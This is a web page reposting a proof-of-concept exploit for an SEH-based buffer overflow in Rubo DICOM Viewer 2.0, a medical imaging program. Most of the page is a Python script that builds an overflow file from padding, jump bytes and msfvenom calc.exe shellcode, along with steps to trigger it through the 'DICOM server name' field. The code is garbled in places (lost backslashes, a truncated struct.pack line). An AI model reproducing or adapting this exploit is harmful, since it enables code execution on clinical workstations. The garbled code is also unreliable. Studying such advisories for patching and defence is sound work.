Rubo DICOM Viewer 2.0 Buffer Overflow ↭ – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 20th, 2020 📆 | 3540 Views ⚑

0

Rubo DICOM Viewer 2.0 Buffer Overflow ↭

# Exploit Title: Rubo DICOM Viewer 2.0 – Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging – DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to “DICOM server name” field
# 6. pop calc

#!/usr/bin/python

import struct

junk1 = “A”*1868

#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack(‘

jmp1 = “xebxf8xccxcc”

jmp2 = “xe9x11xFFxFFxFFx90”

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b “x00x0d” -f c
#Payload size: 220 bytes
calc = (“xd9xc3xbax3axf3xa8x97xd9x74x24xf4x5bx33xc9xb1”
“x31x31x53x18x03x53x18x83xc3x3ex11x5dx6bxd6x57”
“x9ex94x26x38x16x71x17x78x4cxf1x07x48x06x57xab”
“x23x4ax4cx38x41x43x63x89xecxb5x4ax0ax5cx85xcd”
“x88x9fxdax2dxb1x6fx2fx2fxf6x92xc2x7dxafxd9x71”
“x92xc4x94x49x19x96x39xcaxfex6ex3bxfbx50xe5x62”
“xdbx53x2ax1fx52x4cx2fx1ax2cxe7x9bxd0xafx21xd2”
“x19x03x0cxdbxebx5dx48xdbx13x28xa0x18xa9x2bx77”
“x63x75xb9x6cxc3xfex19x49xf2xd3xfcx1axf8x98x8b”
“x45x1cx1ex5fxfex18xabx5exd1xa9xefx44xf5xf2xb4”
“xe5xacx5ex1ax19xaex01xc3xbfxa4xafx10xb2xe6xa5”
“xe7x40x9dx8bxe8x5ax9exbbx80x6bx15x54xd6x73xfc”
“x11x28x3ex5dx33xa1xe7x37x06xacx17xe2x44xc9x9b”
“x07x34x2ex83x6dx31x6ax03x9dx4bxe3xe6xa1xf8x04”
“x23xc2x9fx96xafx2bx3ax1fx55x34”)

junk2 = “x90″*14

buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh

with open(“overview.txt”,”wb”) as f:
f.write(buffer[:-1])

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...